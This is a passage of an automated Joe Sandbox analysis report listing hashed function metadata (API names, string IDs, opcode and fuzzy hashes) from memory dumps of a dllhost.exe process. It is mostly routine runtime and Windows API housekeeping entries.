                                                  • Opcode ID: 6417028e0581c33fb66ecbcc2788d1ac89801e3df6f6497bc360079463109eef
                                                  • Instruction ID: 423058da0687807c60cb1aeb8fad074e48fccbea7df1a687cf14fa5070263f54
                                                  • Opcode Fuzzy Hash: 6417028e0581c33fb66ecbcc2788d1ac89801e3df6f6497bc360079463109eef
                                                  • Instruction Fuzzy Hash: 0D01406570174082EB24AB22F84C71977B0FB4AB49F249C2BCD4D863A6EF3DD859C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: e59c82fe0f2ec094d57bed0c98c400f651c9509d4f271adb2dc6c0c8ab65cd82
                                                  • Instruction ID: 86ce799940c794b7295ee004d882f9a76a4f769079e886155fca4fc14a0f5125
                                                  • Opcode Fuzzy Hash: e59c82fe0f2ec094d57bed0c98c400f651c9509d4f271adb2dc6c0c8ab65cd82
                                                  • Instruction Fuzzy Hash: 01F0442230468192E7208B51F5987596B61F759BDCF94D423DA49C65A5DE3CCE8DC700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: f0253bf3bdf199985f6c2e3295dc4ed2139203a79a19ecb3f89a7ae47e478241
                                                  • Instruction ID: e0a98215f57a48539876a542b0e9bfb743193ce2778ccbea43c620cd6ecac719
                                                  • Opcode Fuzzy Hash: f0253bf3bdf199985f6c2e3295dc4ed2139203a79a19ecb3f89a7ae47e478241
                                                  • Instruction Fuzzy Hash: 30F0966531160081EB148B24E84C36A6730FB467A9F74FA1BDA6A851E5DF3CC849C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: 2f10e4b1bb55b8476a2540ab013bb770cdd98ab53081f051a71e1da94108be6d
                                                  • Instruction ID: 3723793bc1117977482d11987ac7f17b1586bbbe0b5e10dfa488c0317ecd993e
                                                  • Opcode Fuzzy Hash: 2f10e4b1bb55b8476a2540ab013bb770cdd98ab53081f051a71e1da94108be6d
                                                  • Instruction Fuzzy Hash: 7DF08225704B8082EA109B17B91811D6661FB49FC8F64E833EE568FB1ADE2CC846C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f6859916c19b6cfbcb507cf25c27f09489149bbcb7d7f97a4334c647396ff50a
                                                  • Instruction ID: f20bae558e245d435a444f816ffd7771e1d6d57ac465ec81643030d10823ee87
                                                  • Opcode Fuzzy Hash: f6859916c19b6cfbcb507cf25c27f09489149bbcb7d7f97a4334c647396ff50a
                                                  • Instruction Fuzzy Hash: EA02CA36619B8486E7A0CB55F49835AB7B0F3C6794F205517EA8E87BA9DF7CC844CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: ca3cd154e60a15d8a4e1dbc58d691a45d730f05f61dafc41667bf4e2f9e70319
                                                  • Instruction ID: ca5e30fc73cb4c20c2c9f7ccbc8ccb3e0ac0a55e8794687ad68135b3480b7395
                                                  • Opcode Fuzzy Hash: ca3cd154e60a15d8a4e1dbc58d691a45d730f05f61dafc41667bf4e2f9e70319
                                                  • Instruction Fuzzy Hash: 44617976519B44C6E760CB25E49831AB7B0F38A748F206917EA8D87BA9DF7CC940CB04
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000003.1924663454.000002D8B0A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A30000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_3_2d8b0a30000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction ID: d5b736e096e9a358102054d49afcd6bb968da04989ff947d0ab766f104e1e0da
                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction Fuzzy Hash: D911732BA15A1342F6553168E45F36E10917F5777CF382E27EA768F6D6CE64CC414101
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction ID: 3e73ac33dfd4ad27ccee33382cbc70feb4d512ba57f83d4d78fedc094bc48838
                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction Fuzzy Hash: 7B113332A90B1101F6541128E45D3692D49BB573FCF79EE27E976866DBCF688C818608
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000003.1924663454.000002D8B0A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A30000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_3_2d8b0a30000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm$r iterator'
                                                  • API String ID: 3242871069-2773574969
                                                  • Opcode ID: ca5d9eaa95c438554c2903f354aaa720dc8acf5dd20a0dc0b5b10fb3cccfabab
                                                  • Instruction ID: 3fdf7ba7e801738623cd1449f7142ae5fbfc0b4ffd7026f4a2608c21f71b6335
                                                  • Opcode Fuzzy Hash: ca5d9eaa95c438554c2903f354aaa720dc8acf5dd20a0dc0b5b10fb3cccfabab
                                                  • Instruction Fuzzy Hash: 9A519A323516118AEB24CF16E448B6C77A1F346B9CF24E927EA4A87788DF79EC41C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: 4e447ab6f43e0dd97ca79f956e0f36bf66df1e20fe9b1e0794ac99b1f0ba565c
                                                  • Instruction ID: 8803f77692e95907564045c06d1bbb18eb673652f2794c89ec26c9fc7e72ea08
                                                  • Opcode Fuzzy Hash: 4e447ab6f43e0dd97ca79f956e0f36bf66df1e20fe9b1e0794ac99b1f0ba565c
                                                  • Instruction Fuzzy Hash: D451BC72B116008AEB54CF55E448B6CB7A9F756B8CF259A23EE5A83788DF78DC41C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 0aa225cb1cadef72a45b87c5109ef4035a9212e37d75eff9152e78c65fc2b4b2
                                                  • Instruction ID: 1810961d02e6e0caacf2889afe39e5b0401fd84b7d00cdc49d0a10ba9fa628c5
                                                  • Opcode Fuzzy Hash: 0aa225cb1cadef72a45b87c5109ef4035a9212e37d75eff9152e78c65fc2b4b2
                                                  • Instruction Fuzzy Hash: C761AE32914BC481EB70DF15E4443DAB7A0F796B88F145A17EB9A83B96DF78C590CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000003.1924663454.000002D8B0A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A30000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_3_2d8b0a30000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: 4449a9b682cb89d450f78971ce03173a0e31fd8ce334149503fbd8f0d91e758c
                                                  • Instruction ID: b409ef711f7c07f6daf0c54b4cc75b41f205160c2bf9a774cfe23304d85a0749
                                                  • Opcode Fuzzy Hash: 4449a9b682cb89d450f78971ce03173a0e31fd8ce334149503fbd8f0d91e758c
                                                  • Instruction Fuzzy Hash: 0C5180321407908AEBB48F15944835D77A0F766B9DF28A957EA99C7BD5CF38DCA0C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: 4449a9b682cb89d450f78971ce03173a0e31fd8ce334149503fbd8f0d91e758c
                                                  • Instruction ID: 5d6e1631a8ca137fac4ddbb6d326a980c2147101624d2f492a7616df0f8fef43
                                                  • Opcode Fuzzy Hash: 4449a9b682cb89d450f78971ce03173a0e31fd8ce334149503fbd8f0d91e758c
                                                  • Instruction Fuzzy Hash: 5A517D3392429086EB648F65944835877B4F356B9CF28A917DB9987BD5CF38D8A1CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 7831a55c2ef4f99c6d4e75b771c167ca5dae29e291e29756cdefab7d0c6e5865
                                                  • Instruction ID: a9267410cad08fa7ddc5657de6450eb1d5a898f063df74a3fefb922c7dadc833
                                                  • Opcode Fuzzy Hash: 7831a55c2ef4f99c6d4e75b771c167ca5dae29e291e29756cdefab7d0c6e5865
                                                  • Instruction Fuzzy Hash: 04118912714B4195FB10A725E80835D67B4F74A748FA46827EE5AD36D5EF28CD06C704
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: cd7ead245226fb0ff8416072dd6c86dfb22f41206e5c1354dc7575ed798eccf0
                                                  • Instruction ID: afd5763785406c0f1268d50d82ffcc0833b7357316f1db5efb68b047029095c0
                                                  • Opcode Fuzzy Hash: cd7ead245226fb0ff8416072dd6c86dfb22f41206e5c1354dc7575ed798eccf0
                                                  • Instruction Fuzzy Hash: E131C422B01B5182EB14EF66D55876967B0FB56B88F189833CF4887B55EF34D866C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 3d8111ac03d79fd3404cfd3b8bb5e35de645481c19c298062627da4548e3af8b
                                                  • Instruction ID: 9a93d47328d0bfb85b28f32ab582b37b0a3feba777ee4259ff791b55ee4ef259
                                                  • Opcode Fuzzy Hash: 3d8111ac03d79fd3404cfd3b8bb5e35de645481c19c298062627da4548e3af8b
                                                  • Instruction Fuzzy Hash: 42D1DF72B04A808AE721CF69D4583AC3BB1F356B9CF249617DE5D97B9ADE34C906C340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: 80d9ba640633e664d37536508cc0a4a26b735903ebb0d8b8d4ae8ea91fecf4e1
                                                  • Instruction ID: ae713076178dcd36b59d2bede7e3524c8608a398496d325058d9822cf47af1f0
                                                  • Opcode Fuzzy Hash: 80d9ba640633e664d37536508cc0a4a26b735903ebb0d8b8d4ae8ea91fecf4e1
                                                  • Instruction Fuzzy Hash: D80102B2610A908AE705EF67B90438977A1F78CFC5F4A4025FB9953739DE38D491C744
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: 68e3aa918e40f2a59efd4a77bf87b80fbffd346b4caa48f43eabcedde74eb837
                                                  • Instruction ID: 9ad9c8924edd2636d4fa808f7669b368c49a128116378823310b49b763af616e
                                                  • Opcode Fuzzy Hash: 68e3aa918e40f2a59efd4a77bf87b80fbffd346b4caa48f43eabcedde74eb837
                                                  • Instruction Fuzzy Hash: 5E016932610B80C6E708DF66E80814D7BA0F789F88F599927DF4983729DF34E851C740
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002D8B0A732BB), ref: 000002D8B0A733EC
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002D8B0A732BB), ref: 000002D8B0A73477
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ConsoleErrorLastMode
                                                  • String ID:
                                                  • API String ID: 953036326-0
                                                  • Opcode ID: 9a0209e8511a10fd3386f0f56cb65ece6bc0a2612e029ae558c28dd6c9360970
                                                  • Instruction ID: 0dbd29a0ee2ac2f6998052583c89b6b20b7e4d40e77be4647d61eceb6666ff9e
                                                  • Opcode Fuzzy Hash: 9a0209e8511a10fd3386f0f56cb65ece6bc0a2612e029ae558c28dd6c9360970
                                                  • Instruction Fuzzy Hash: 3691F37371065089F765AF6594483AD2FA0F746B8CF75A90BDE0AA7A86DF34CC82C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: 4fed39dde851fcd8fc4d049624dd97c798a08dd805cf236f1a62443ce0db6f3a
                                                  • Instruction ID: 924857161f133bef893906086201d48405e5b220aad79135ee841b605bda1721
                                                  • Opcode Fuzzy Hash: 4fed39dde851fcd8fc4d049624dd97c798a08dd805cf236f1a62443ce0db6f3a
                                                  • Instruction Fuzzy Hash: 6771D232A00B8146EB69DF2598683EE67B0F78678CF642827DD09C7B99DE34CE05C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000003.1924663454.000002D8B0A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A30000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_3_2d8b0a30000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  • Opcode ID: 432acf9014410cd6b61937995a8f5639f2b935c8f333f59e616f22aec490a317
                                                  • Instruction ID: 378df1550cee132318bd00ef321e8b7ff066b1fe2a1117c2315f04f8782cc995
                                                  • Opcode Fuzzy Hash: 432acf9014410cd6b61937995a8f5639f2b935c8f333f59e616f22aec490a317
                                                  • Instruction Fuzzy Hash: 2661AE33504BC481EB708F15E48439AB7A0F796B98F245A17EB9897B95DF38C594CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: 60806b6e5981ec3bc5cc332c647bab245b1cb03d9a404e51140869ab20dc0ddc
                                                  • Instruction ID: 86b1ce66b601a9560c71205615ada22511ae4c3f7c004aa252ada94260c5e38f
                                                  • Opcode Fuzzy Hash: 60806b6e5981ec3bc5cc332c647bab245b1cb03d9a404e51140869ab20dc0ddc
